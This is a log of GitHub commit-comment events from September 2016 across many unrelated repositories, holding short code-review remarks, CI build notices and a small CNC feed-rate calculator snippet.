{"id":"4582283664","type":"CommitCommentEvent","actor":{"login":"litherum"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19076006,"position":130,"line":762,"path":"css-fonts/Fonts.src.html","commit_id":"6a0c28b768998d2cf443699f4f9310b32bdb407e","created_at":"2016-09-19T09:41:42Z","updated_at":"2016-09-19T09:41:42Z","body":"In a subsequent commit, I migrated these to real percentages.\r\n\r\nAccording to the OpenType spec, the percentages refer to width of glyphs relative to 100%. I did a little bit research on different fonts (I only looked at Times and Avenir, but those are probably sufficient) and found that 80% to 120% seem to match roughly what real fonts use. Perhaps these can be tweaked in the future, but a 5% width would be way too small."}},"created_at":"2016-09-19T09:41:42Z"}
{"id":"4582290559","type":"CommitCommentEvent","actor":{"login":"litherum"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19076016,"position":197,"line":846,"path":"css-fonts/Fonts.src.html","commit_id":"6a0c28b768998d2cf443699f4f9310b32bdb407e","created_at":"2016-09-19T09:43:13Z","updated_at":"2016-09-19T09:43:13Z","body":"Yep. I did this in a subsequent commit."}},"created_at":"2016-09-19T09:43:13Z"}
{"id":"4582291293","type":"CommitCommentEvent","actor":{"login":"abrodkin"},"repo":{"name":"vlad-zakharov/u-boot"},"payload":{"comment":{"id":19076017,"position":72,"line":72,"path":"drivers/clk/clk_axc003.c","commit_id":"2ba1560accd1e0bf62d30b7344381c27bab8ff1d","created_at":"2016-09-19T09:43:22Z","updated_at":"2016-09-19T09:43:22Z","body":"I'd add a comment on why we need that delay at all and why we do it in that crappy way."}},"created_at":"2016-09-19T09:43:22Z"}
{"id":"4582291848","type":"CommitCommentEvent","actor":{"login":"litherum"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19076020,"position":171,"line":797,"path":"css-fonts/Fonts.src.html","commit_id":"6a0c28b768998d2cf443699f4f9310b32bdb407e","created_at":"2016-09-19T09:43:30Z","updated_at":"2016-09-19T09:43:30Z","body":"I agree, and a subsequent commit migrated to this syntax."}},"created_at":"2016-09-19T09:43:30Z"}
{"id":"4582293994","type":"CommitCommentEvent","actor":{"login":"fieldOfView"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19076026,"position":5,"line":406,"path":"resources/definitions/fdmprinter.def.json","commit_id":"6909f88ce6d3ea335fc2bd2f159fe64c2105aa21","created_at":"2016-09-19T09:43:56Z","updated_at":"2016-09-19T09:43:56Z","body":"You know that the SettingTextField textfield is limited to 10 characters, right? ;-)"}},"created_at":"2016-09-19T09:43:56Z"}
{"id":"4582294409","type":"CommitCommentEvent","actor":{"login":"JanJoris"},"repo":{"name":"JanJoris/oh-my-posh"},"payload":{"comment":{"id":19076027,"position":16,"line":21,"path":"Themes/Agnoster.psm1","commit_id":"272ddfcefe89f5034bc628107ce350d88340d88c","created_at":"2016-09-19T09:44:02Z","updated_at":"2016-09-19T09:44:02Z","body":"Powerline does start with a space. But I could make it configurable with a default to space."}},"created_at":"2016-09-19T09:44:02Z"}
{"id":"4582297454","type":"CommitCommentEvent","actor":{"login":"thomasmars"},"repo":{"name":"h5p/h5p-interactive-video"},"payload":{"comment":{"id":19076033,"position":7,"line":151,"path":"scripts/interaction.js","commit_id":"999c10c80a8398351c153cced999c03964b4879b","created_at":"2016-09-19T09:44:41Z","updated_at":"2016-09-19T09:44:41Z","body":"event not defined"}},"created_at":"2016-09-19T09:44:41Z"}
{"id":"4582297509","type":"CommitCommentEvent","actor":{"login":"fencim"},"repo":{"name":"bcole/protractor-angular-screenshot-reporter"},"payload":{"comment":{"id":19076035,"position":5,"line":116,"path":"index.js","commit_id":"0cc5d19b793d5cef129b36a904df4e55cf428eb1","created_at":"2016-09-19T09:44:42Z","updated_at":"2016-09-19T09:44:42Z","body":"This statement is causing the expression if (!this.preserveDirectory) to always false.\r\nThis could have been `typeof options.preserveDirectory === \"undefined\" ? true : options.preserveDirectory`"}},"created_at":"2016-09-19T09:44:42Z"}
{"id":"4582297863","type":"CommitCommentEvent","actor":{"login":"abrodkin"},"repo":{"name":"vlad-zakharov/u-boot"},"payload":{"comment":{"id":19076038,"position":117,"line":117,"path":"drivers/clk/clk_axc003.c","commit_id":"2ba1560accd1e0bf62d30b7344381c27bab8ff1d","created_at":"2016-09-19T09:44:46Z","updated_at":"2016-09-19T09:44:46Z","body":"> ARC AXS103 is __proven_to_work__ only for limited set of CPU clocks.."}},"created_at":"2016-09-19T09:44:46Z"}
{"id":"4582302233","type":"CommitCommentEvent","actor":{"login":"ijunaidfarooq"},"repo":{"name":"dashingshakeel/phone_book"},"payload":{"comment":{"id":19076047,"position":null,"line":null,"path":null,"commit_id":"9defd824cb2831aad5c9befed1770d8868461afe","created_at":"2016-09-19T09:45:43Z","updated_at":"2016-09-19T09:45:43Z","body":"what changes you made here?"}},"created_at":"2016-09-19T09:45:43Z"}
{"id":"4582306635","type":"CommitCommentEvent","actor":{"login":"RosivaldoTavares"},"repo":{"name":"msouto/20162-redes-2t-programacao-redes"},"payload":{"comment":{"id":19076059,"position":null,"line":null,"path":null,"commit_id":"7bd6d43cdd17b513da95fe4a03979d1d443ceb58","created_at":"2016-09-19T09:46:41Z","updated_at":"2016-09-19T09:46:41Z","body":"Começando"}},"created_at":"2016-09-19T09:46:41Z"}
{"id":"4582309355","type":"CommitCommentEvent","actor":{"login":"castor87"},"repo":{"name":"castor87/dpl"},"payload":{"comment":{"id":19076070,"position":null,"line":null,"path":null,"commit_id":"a7d2437bd5c1011b7b19154561de9f814dd239fe","created_at":"2016-09-19T09:47:18Z","updated_at":"2016-09-19T09:47:18Z","body":"teste"}},"created_at":"2016-09-19T09:47:18Z"}
{"id":"4582309695","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"itottm/achieve"},"payload":{"comment":{"id":19076071,"position":1,"line":3,"path":".idea/workspace.xml","commit_id":"2f8363c8e96fe53c180c670f730f67119eee11eb","created_at":"2016-09-19T09:47:21Z","updated_at":"2016-09-19T09:47:21Z","body":".idea/workspace.xml\r\nのファイルは、何のために使っていますか？"}},"created_at":"2016-09-19T09:47:21Z"}
{"id":"4582310288","type":"CommitCommentEvent","actor":{"login":"fighteryu"},"repo":{"name":"fighteryu/python"},"payload":{"comment":{"id":19076072,"position":null,"line":null,"path":null,"commit_id":"8b70911802e98f0e903a14c018c23dddffa39248","created_at":"2016-09-19T09:47:29Z","updated_at":"2016-09-19T09:47:29Z","body":"zigbee.cpp"}},"created_at":"2016-09-19T09:47:29Z"}
{"id":"4582312163","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19076076,"position":57,"line":64,"path":"cura/Settings/SettingInheritanceManager.py","commit_id":"5d84490d701a49c32b39bb9fc07fe5a6c5512599","created_at":"2016-09-19T09:47:53Z","updated_at":"2016-09-19T09:47:53Z","body":"I remembered later during my review that this is not referring to the parent definition throughout the JSON files (e.g. inheritance of a setting from fdmprinter.def.json to ultimaker2.def.json) but to the type of parent-child relation that is currently only used for indenting. I was thinking wrongly; my mistake."}},"created_at":"2016-09-19T09:47:53Z"}
{"id":"4582315021","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"itottm/achieve"},"payload":{"comment":{"id":19076083,"position":3,"line":16,"path":"app/mailers/notice_mailer.rb","commit_id":"6942af0e83235cd19a7b3a67bdca796dd6b94cd4","created_at":"2016-09-19T09:48:28Z","updated_at":"2016-09-19T09:48:28Z","body":"不要な空行です。\r\nコーディング規約に則って記載してください。\r\nエンジニアの力量は、書いたコードの精緻さに宿ります。\r\nhttps://shugo.net/ruby-codeconv/codeconv.html"}},"created_at":"2016-09-19T09:48:28Z"}
{"id":"4582315877","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"itottm/achieve"},"payload":{"comment":{"id":19076087,"position":6,"line":18,"path":"app/mailers/notice_mailer.rb","commit_id":"6942af0e83235cd19a7b3a67bdca796dd6b94cd4","created_at":"2016-09-19T09:48:38Z","updated_at":"2016-09-19T09:48:38Z","body":"インデントが深いです。\r\nコーディング規約に則って記載してください。\r\nエンジニアの力量は、書いたコードの精緻さに宿ります。\r\nhttps://shugo.net/ruby-codeconv/codeconv.html"}},"created_at":"2016-09-19T09:48:38Z"}
{"id":"4582316406","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19076089,"position":null,"line":null,"path":null,"commit_id":"2a6a02c8dc4c95c0f75c90270b15a8bfc17bd9d8","created_at":"2016-09-19T09:48:44Z","updated_at":"2016-09-19T09:48:44Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1044](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13501&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 239, ignored: 3 Build time: 00:08:48"}},"created_at":"2016-09-19T09:48:44Z"}
{"id":"4582316619","type":"CommitCommentEvent","actor":{"login":"yesbe97"},"repo":{"name":"yesbe97/kladblok"},"payload":{"comment":{"id":19076090,"position":15,"line":30,"path":"Form1.cs","commit_id":"778873ad2cd466269e18df41ebda51be35b1febd","created_at":"2016-09-19T09:48:47Z","updated_at":"2016-09-19T09:48:47Z","body":"Needs to change in something better"}},"created_at":"2016-09-19T09:48:47Z"}
{"id":"4582317669","type":"CommitCommentEvent","actor":{"login":"thomasmars"},"repo":{"name":"h5p/h5p-interactive-video"},"payload":{"comment":{"id":19076093,"position":24,"line":245,"path":"scripts/interaction.js","commit_id":"999c10c80a8398351c153cced999c03964b4879b","created_at":"2016-09-19T09:49:00Z","updated_at":"2016-09-19T09:49:00Z","body":"I'm curious, shouldn't goto types of timecode also be anchors, since they are essentially same page navigations ?"}},"created_at":"2016-09-19T09:49:00Z"}
{"id":"4582319348","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19076101,"position":81,"line":118,"path":"cura/Settings/SettingInheritanceManager.py","commit_id":"7793cb16d1a421afc1e5badfc342d92f76fcb517","created_at":"2016-09-19T09:49:22Z","updated_at":"2016-09-19T09:49:22Z","body":"Typo."}},"created_at":"2016-09-19T09:49:22Z"}
{"id":"4582319571","type":"CommitCommentEvent","actor":{"login":"bozana"},"repo":{"name":"pkp/ojs"},"payload":{"comment":{"id":19076103,"position":302,"line":1182,"path":"classes/install/Upgrade.inc.php","commit_id":"6d15d1508ef2fdacd73efe9e268068cf44b263e1","created_at":"2016-09-19T09:49:26Z","updated_at":"2016-09-19T09:49:26Z","body":"Shouldn't here also this be used: `$submissionFile->setUserGroupId($managerUserGroup->getId())` ? The also the `$managerUserGroup` from above shouldn't be unset above..."}},"created_at":"2016-09-19T09:49:26Z"}
{"id":"4582319693","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"itottm/achieve"},"payload":{"comment":{"id":19076104,"position":5,"line":15,"path":"config/initializers/devise.rb","commit_id":"3c433f5b7cc5c50e081ae92574288324de8d5801","created_at":"2016-09-19T09:49:26Z","updated_at":"2016-09-19T09:49:26Z","body":"サンプルメールアドレスは、\r\n@example.com\r\nなどをお使いください。"}},"created_at":"2016-09-19T09:49:26Z"}
{"id":"4582321937","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"itottm/achieve"},"payload":{"comment":{"id":19076125,"position":5,"line":4,"path":"app/views/blogs/edit.html.erb","commit_id":"03250011cd6836fcbcbe3711ad367eea8626cf21","created_at":"2016-09-19T09:49:55Z","updated_at":"2016-09-19T09:49:55Z","body":"インデントが深いです。\r\nコーディング規約に則って記載してください。\r\nエンジニアの力量は、書いたコードの精緻さに宿ります。\r\nhttps://shugo.net/ruby-codeconv/codeconv.html"}},"created_at":"2016-09-19T09:49:55Z"}
{"id":"4582323124","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19076130,"position":84,"line":121,"path":"cura/Settings/SettingInheritanceManager.py","commit_id":"7793cb16d1a421afc1e5badfc342d92f76fcb517","created_at":"2016-09-19T09:50:11Z","updated_at":"2016-09-19T09:50:11Z","body":"You could put this check earlier in the function, by the way. Might save some processing time?"}},"created_at":"2016-09-19T09:50:11Z"}
{"id":"4582331391","type":"CommitCommentEvent","actor":{"login":"GeekAbdelouahed"},"repo":{"name":"GeekAbdelouahed/TouggourtiAndroid"},"payload":{"comment":{"id":19076147,"position":124,"line":106,"path":"app/src/main/java/touggourti/acamdimyatinfo/com/MainActivity.java","commit_id":"d6388c29b6b40d81f2a038916ea2f570711ea291","created_at":"2016-09-19T09:51:52Z","updated_at":"2016-09-19T09:51:52Z","body":"done :+1: "}},"created_at":"2016-09-19T09:51:52Z"}
{"id":"4582335241","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"suzukisan22/tweet"},"payload":{"comment":{"id":19076157,"position":5,"line":17,"path":"config/application.rb","commit_id":"2607979d646ba515d9f324d8c0b0ec3ef51b0892","created_at":"2016-09-19T09:52:38Z","updated_at":"2016-09-19T09:52:38Z","body":"こちらは何のために記載されていますか？"}},"created_at":"2016-09-19T09:52:38Z"}
{"id":"4582335592","type":"CommitCommentEvent","actor":{"login":"rylyade1"},"repo":{"name":"SecurityRAT/SecurityRAT"},"payload":{"comment":{"id":19076158,"position":null,"line":null,"path":null,"commit_id":"bc2b5a4a2efca0a791981982540a5a1818f9cf2d","created_at":"2016-09-19T09:52:42Z","updated_at":"2016-09-19T09:52:42Z","body":"Thanks for the advice."}},"created_at":"2016-09-19T09:52:42Z"}
{"id":"4582337288","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19076160,"position":11,"line":159,"path":"resources/qml/Settings/SettingView.qml","commit_id":"132ed1d25835cdb45a4be398f1a982067ac09afe","created_at":"2016-09-19T09:53:05Z","updated_at":"2016-09-19T09:53:05Z","body":"Shouldn't this logic be moved to the Python side?"}},"created_at":"2016-09-19T09:53:05Z"}
{"id":"4582339242","type":"CommitCommentEvent","actor":{"login":"osfans"},"repo":{"name":"rime/librime"},"payload":{"comment":{"id":19076165,"position":null,"line":null,"path":null,"commit_id":"c8970bea05405bf5e0d8e03a71ec9021bc94ee3f","created_at":"2016-09-19T09:53:29Z","updated_at":"2016-09-19T09:53:29Z","body":"@lotem 匿名函數來了，幫忙審閱。`conv_to_utf`這個沒有搞匿名的。"}},"created_at":"2016-09-19T09:53:29Z"}
{"id":"4582339884","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19076166,"position":null,"line":null,"path":null,"commit_id":"5448c328f8199d9bf4db5079af5cb12680ef4285","created_at":"2016-09-19T09:53:38Z","updated_at":"2016-09-19T09:53:38Z","body":"But : this file must not be in styles-public, it's only for admin (if i don't make error).\r\n\r\nNot this commit related"}},"created_at":"2016-09-19T09:53:38Z"}
{"id":"4582339978","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"suzukisan22/tweet"},"payload":{"comment":{"id":19076167,"position":null,"line":null,"path":null,"commit_id":"c46b8f74e97d58c5a442b3140f4f0042cbb68156","created_at":"2016-09-19T09:53:39Z","updated_at":"2016-09-19T09:53:39Z","body":"Rubyのコーディング規約に則って記載しましょう。\r\nインデント 幅は2とする。また、インデントにはスペースのみを使用し、タブは使用 しない。(環境によりタブ幅が異なるため。)\r\nhttps://shugo.net/ruby-codeconv/codeconv.html"}},"created_at":"2016-09-19T09:53:39Z"}
{"id":"4582341456","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":19076169,"position":5,"line":5305,"path":"xwiki-platform-core/xwiki-platform-oldcore/src/main/java/com/xpn/xwiki/XWiki.java","commit_id":"48bd7e92cf953010e5a6b1fd8dbd62d243e7c3cf","created_at":"2016-09-19T09:53:58Z","updated_at":"2016-09-19T09:53:58Z","body":"s/user alias/user id ?"}},"created_at":"2016-09-19T09:53:58Z"}
{"id":"4582342974","type":"CommitCommentEvent","actor":{"login":"josemvm"},"repo":{"name":"3liz/lizmap-web-client"},"payload":{"comment":{"id":19076174,"position":null,"line":null,"path":null,"commit_id":"fd4e6e84cf5f5fbf61201ac51024107eda2a8db0","created_at":"2016-09-19T09:54:18Z","updated_at":"2016-09-19T09:54:18Z","body":"hi @mdouchin!\r\n\r\nin my opinion, the \"popup.msg.no.result\" will be showed like a tooltip result (or precisely over the point where the click was made) and not in the dock, so when the dock appears it takes up too much space on the map area.\r\n\r\nthanks for your work!"}},"created_at":"2016-09-19T09:54:18Z"}
{"id":"4582343722","type":"CommitCommentEvent","actor":{"login":"zeddmaxx"},"repo":{"name":"zeddmaxx/fishbowl-notebooks"},"payload":{"comment":{"id":19076176,"position":null,"line":null,"path":null,"commit_id":"6b19ba23c2762fdd04cf6b87d8850e58e6ba0eda","created_at":"2016-09-19T09:54:27Z","updated_at":"2016-09-19T09:54:27Z","body":"Hello I'm Zoya an Outreachy applicant, I wanted to know do I need to make iPython notebooks for Temp/Humidity Sensor in order to start contributing? I mean I have to write the complete code along with illustrations?"}},"created_at":"2016-09-19T09:54:27Z"}
{"id":"4582344228","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"suzukisan22/tweet"},"payload":{"comment":{"id":19076181,"position":3,"line":3,"path":"app/views/tweets/new.html.erb","commit_id":"6b209987a89d397c684e74dbe81fd62f7040120d","created_at":"2016-09-19T09:54:34Z","updated_at":"2016-09-19T09:54:34Z","body":"Rubyのコーディング規約に則って記載しましょう。\r\nインデント 幅は2とする。また、インデントにはスペースのみを使用し、タブは使用 しない。(環境によりタブ幅が異なるため。)\r\nhttps://shugo.net/ruby-codeconv/codeconv.html"}},"created_at":"2016-09-19T09:54:34Z"}
{"id":"4582346743","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"suzukisan22/tweet"},"payload":{"comment":{"id":19076188,"position":2,"line":2,"path":"config/routes.rb","commit_id":"88e263e4a7684d2968778baa3064eba529805554","created_at":"2016-09-19T09:55:07Z","updated_at":"2016-09-19T09:55:07Z","body":"最初からあるコメント行は、すべて消してください。不要ですー。"}},"created_at":"2016-09-19T09:55:07Z"}
{"id":"4582347929","type":"CommitCommentEvent","actor":{"login":"massacreformash"},"repo":{"name":"gfwlist/gfwlist"},"payload":{"comment":{"id":19076190,"position":null,"line":null,"path":null,"commit_id":"fca34f3d87ef042723ee42ceb95a49427bb12dcd","created_at":"2016-09-19T09:55:20Z","updated_at":"2016-09-19T09:55:20Z","body":"wtf........"}},"created_at":"2016-09-19T09:55:20Z"}
{"id":"4582357175","type":"CommitCommentEvent","actor":{"login":"qknight"},"repo":{"name":"Jeffail/leaps"},"payload":{"comment":{"id":19076205,"position":null,"line":null,"path":null,"commit_id":"70524e3d02d0cf31f3d13737193a1459150781c8","created_at":"2016-09-19T09:57:14Z","updated_at":"2016-09-19T09:57:14Z","body":"oh no, it is not contained in the bundled version ;P\r\n\r\nwhy do i know? i've been testing for 10 minutes and it didn't work as expected until i realized. we should get https://github.com/Jeffail/leaps/issues/33 forward!"}},"created_at":"2016-09-19T09:57:14Z"}
{"id":"4582357753","type":"CommitCommentEvent","actor":{"login":"ycgang"},"repo":{"name":"ycgang/0919test2"},"payload":{"comment":{"id":19076207,"position":null,"line":null,"path":null,"commit_id":"93c7c75dec75e0e87ff20aed89bde237c876c5ad","created_at":"2016-09-19T09:57:21Z","updated_at":"2016-09-19T09:57:21Z","body":"12313"}},"created_at":"2016-09-19T09:57:21Z"}
{"id":"4582359999","type":"CommitCommentEvent","actor":{"login":"jus61"},"repo":{"name":"gianni001/ExileReborn"},"payload":{"comment":{"id":19076213,"position":null,"line":null,"path":null,"commit_id":"4d47f828d9b3aaaa23ff43912d6ebd14bda6395c","created_at":"2016-09-19T09:57:51Z","updated_at":"2016-09-19T09:57:51Z","body":"thx"}},"created_at":"2016-09-19T09:57:51Z"}
{"id":"4582361183","type":"CommitCommentEvent","actor":{"login":"fuyousgz"},"repo":{"name":"fuyousgz/My-Project"},"payload":{"comment":{"id":19076217,"position":null,"line":null,"path":null,"commit_id":"2311be00b0eb96a1929e33a14674dcd7ea7a1391","created_at":"2016-09-19T09:58:07Z","updated_at":"2016-09-19T09:58:07Z","body":"感染你干啥"}},"created_at":"2016-09-19T09:58:07Z"}
{"id":"4582368692","type":"CommitCommentEvent","actor":{"login":"GeekAbdelouahed"},"repo":{"name":"GeekAbdelouahed/TouggourtiAndroid"},"payload":{"comment":{"id":19076233,"position":110,"line":92,"path":"app/src/main/java/touggourti/acamdimyatinfo/com/MainActivity.java","commit_id":"d6388c29b6b40d81f2a038916ea2f570711ea291","created_at":"2016-09-19T09:59:46Z","updated_at":"2016-09-19T09:59:46Z","body":"done :smile: "}},"created_at":"2016-09-19T09:59:46Z"}
{"id":"4586675377","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19087842,"position":null,"line":null,"path":null,"commit_id":"00421f20cd8ea3727e2d13d4a7428d370b67c7a8","created_at":"2016-09-20T00:00:44Z","updated_at":"2016-09-20T00:00:44Z","body":"129956421-Scalable-Sizing-HTRad-Heat-Crash (RKStrand) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-00421f20cd8ea3727e2d13d4a7428d370b67c7a8-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-20T00:00:44Z"}
{"id":"4586675973","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":19087844,"position":null,"line":null,"path":null,"commit_id":"62f3ded09411fa4378bd9d9584734238bd313345","created_at":"2016-09-20T00:00:54Z","updated_at":"2016-09-20T00:00:54Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#VamBbmAqT2K03hE6iHrbiQ"}},"created_at":"2016-09-20T00:00:54Z"}
{"id":"4586678040","type":"CommitCommentEvent","actor":{"login":"tylerstraub"},"repo":{"name":"home-assistant/home-assistant"},"payload":{"comment":{"id":19087851,"position":null,"line":null,"path":null,"commit_id":"de4cc5034e8b0865fc001a2c7f9282ec68675d03","created_at":"2016-09-20T00:01:28Z","updated_at":"2016-09-20T00:01:28Z","body":"Thank you for this! Before I was wrapping REST calls in shell_command objects to achieve what this built in service now does elegantly. Huge win for the platform, cheers!"}},"created_at":"2016-09-20T00:01:28Z"}
{"id":"4586684591","type":"CommitCommentEvent","actor":{"login":"TheGman117"},"repo":{"name":"TheGman117/CNCCalc"},"payload":{"comment":{"id":19087868,"position":null,"line":null,"path":null,"commit_id":"db152fe1937462fb3a316f6eaf0af740923272a4","created_at":"2016-09-20T00:03:11Z","updated_at":"2016-09-20T00:03:11Z","body":"CalcType = str(input(\"What would you like to calculate today?\"))\r\nif CalcType == \"IPM\":\r\n    FPT = float(input(\"Please input FPT: \"))\r\n    Teeth = int(input(\"Please input amount of teeth on cutter: \"))\r\n    RPM = int(input(\"Please input RPM: \"))\r\n\r\n    IPM = FPT * Teeth * RPM\r\n    print (IPM)\r\n    return\r\nelif CalcType == \"RPM\":\r\n    IPM = int(input(\"Please input desired IPM: \"))\r\n    WOC = float(input(\"Please input width of cut at desired depth: \"))\r\n\r\n    RPM = (IPM * 1000) / (3.14 * WOC)\r\n    print (RPM)\r\n    return\r\nelif CalcType == \"SFM\":\r\n    RPM = int(input(\"Please input RPM: \"))\r\n    WOC = float(input(\"Please input width of cut at desired depth: \"))\r\n\r\n    SFM = WOC * 0.2618 * RPM\r\n    print (SFM)\r\n    return\r\nelif CalcType == \"FPT\":\r\n    IPM = int(input(\"Please input desired IPM: \"))\r\n    Teeth = int(input(\"Please input amount of teeth on cutter: \"))\r\n    RPM = int(input(\"Please input RPM: \"))\r\n\r\n    FPT = IPM / (Teeth * RPM)\r\n    print (FPT)\r\n    return\r\nelse:\r\n    print (\"That is not a valid choice\")\r\n    return\r\n"}},"created_at":"2016-09-20T00:03:11Z"}
{"id":"4586690142","type":"CommitCommentEvent","actor":{"login":"jdalton"},"repo":{"name":"lodash/lodash"},"payload":{"comment":{"id":19087886,"position":null,"line":null,"path":null,"commit_id":"1123594fded647bd8bcac35da7d4554d3ab19f41","created_at":"2016-09-20T00:04:52Z","updated_at":"2016-09-20T00:04:52Z","body":"Related to https://github.com/lodash/lodash-cli/commit/b284d7fc08c8181af7eec99cf528410f1e112c64."}},"created_at":"2016-09-20T00:04:52Z"}
{"id":"4586694447","type":"CommitCommentEvent","actor":{"login":"sridharkaza"},"repo":{"name":"employmeo/employmeo"},"payload":{"comment":{"id":19087909,"position":null,"line":null,"path":null,"commit_id":"83cb52bc7e160c5a2256536e5660fc6a67c724a1","created_at":"2016-09-20T00:06:18Z","updated_at":"2016-09-20T00:06:18Z","body":"Fixed issue #30 "}},"created_at":"2016-09-20T00:06:18Z"}
{"id":"4586695342","type":"CommitCommentEvent","actor":{"login":"tillig"},"repo":{"name":"dotnetjunkie/Mvc"},"payload":{"comment":{"id":19087912,"position":26,"line":26,"path":"src/Microsoft.AspNetCore.Mvc/ApplicationBuilderExtensions.cs","commit_id":"89957e06349ddc3a45977ff19c18d7087ebc6503","created_at":"2016-09-20T00:06:35Z","updated_at":"2016-09-20T00:06:35Z","body":"Looking at the example provided via email...\r\n\r\n```csharp\r\nbuilder.Register(_ => app.GetRequestServiceProvider<RoleManager<User>>()).SingleInstance();\r\n```\r\n\r\n...I'd probably instead do something like this:\r\n\r\n```csharp\r\nbuilder.RegisterType<MyRoleManager>().As<RoleManager<User>>().InstancePerLifetimeScope();\r\n```\r\n\r\nThe idea there is that a request has its own lifetime scope and the role manager would be a logical singleton per scope.\r\n\r\nIf we needed to resolve something to create the scope, it'd be:\r\n\r\n```csharp\r\nbuilder.Register(ctx => new MyRoleManager(ctx.Resolve<ISomething>()))\r\n  .As<RoleManager<User>>()\r\n  .InstancePerLifetimeScope();\r\n```\r\n\r\nFrom an Autofac perspective, I can't imagine needing to get the request service provider from the application itself."}},"created_at":"2016-09-20T00:06:35Z"}
{"id":"4586699340","type":"CommitCommentEvent","actor":{"login":"sridharkaza"},"repo":{"name":"employmeo/employmeo"},"payload":{"comment":{"id":19087926,"position":null,"line":null,"path":null,"commit_id":"98f7c06819db81b0b0b20297e8dc77b4cf33d53a","created_at":"2016-09-20T00:07:52Z","updated_at":"2016-09-20T00:07:52Z","body":"#30"}},"created_at":"2016-09-20T00:07:52Z"}
{"id":"4586700137","type":"CommitCommentEvent","actor":{"login":"sridharkaza"},"repo":{"name":"employmeo/employmeo"},"payload":{"comment":{"id":19087929,"position":null,"line":null,"path":null,"commit_id":"298641f4ec1967787078de4577d3df171d8df232","created_at":"2016-09-20T00:08:08Z","updated_at":"2016-09-20T00:08:08Z","body":"#30"}},"created_at":"2016-09-20T00:08:08Z"}
{"id":"4586700570","type":"CommitCommentEvent","actor":{"login":"Kefta"},"repo":{"name":"SuperiorServers/plib_v2"},"payload":{"comment":{"id":19087932,"position":38,"line":162,"path":"lua/plib/extensions/math.lua","commit_id":"cf7d300b5fd423e72b6574fd00df010ae811f171","created_at":"2016-09-20T00:08:15Z","updated_at":"2016-09-20T00:08:15Z","body":"My weapon base, but this can be used in any random context. It's an arithmetical version of the MD5 crypt algorithm"}},"created_at":"2016-09-20T00:08:15Z"}
{"id":"4586701014","type":"CommitCommentEvent","actor":{"login":"sridharkaza"},"repo":{"name":"employmeo/employmeo"},"payload":{"comment":{"id":19087937,"position":null,"line":null,"path":null,"commit_id":"0f7ca93370a5e913933527078089ee56e7245e0d","created_at":"2016-09-20T00:08:23Z","updated_at":"2016-09-20T00:08:23Z","body":"#30"}},"created_at":"2016-09-20T00:08:23Z"}
{"id":"4586702791","type":"CommitCommentEvent","actor":{"login":"sridharkaza"},"repo":{"name":"employmeo/employmeo"},"payload":{"comment":{"id":19087944,"position":null,"line":null,"path":null,"commit_id":"86dff5e2de0757c9df147cfe1178d60d3b9117f9","created_at":"2016-09-20T00:08:54Z","updated_at":"2016-09-20T00:08:54Z","body":"#30 - done"}},"created_at":"2016-09-20T00:08:54Z"}
{"id":"4586714088","type":"CommitCommentEvent","actor":{"login":"CelticMinstrel"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":19087971,"position":null,"line":null,"path":null,"commit_id":"9721910d980b44d1bffae8b424b564465f1a2859","created_at":"2016-09-20T00:12:27Z","updated_at":"2016-09-20T00:12:27Z","body":"Can't change any settings with this when starting a local game - the dialog is just blank. (At least the \"I'm Ready\" button works, but this is still totally unusable.) This applies to 800x600 and 1024x768, at least. It does seem to work at 1280x960, but I don't see any reason why the current layout shouldn't work on smaller resolutions.\r\n\r\nAlso, Enter does not select \"I'm Ready\". :( I guess maybe this is unavoidable (since it needs to send a chat message), but it's still annoying sometimes."}},"created_at":"2016-09-20T00:12:27Z"}
{"id":"4586716677","type":"CommitCommentEvent","actor":{"login":"mrclay"},"repo":{"name":"mrclay/minify"},"payload":{"comment":{"id":19087976,"position":5,"line":8,"path":"server-info.php","commit_id":"9370e96fd454549876210e35070c82d189ca00b7","created_at":"2016-09-20T00:13:15Z","updated_at":"2016-09-20T00:13:15Z","body":"Yes"}},"created_at":"2016-09-20T00:13:15Z"}
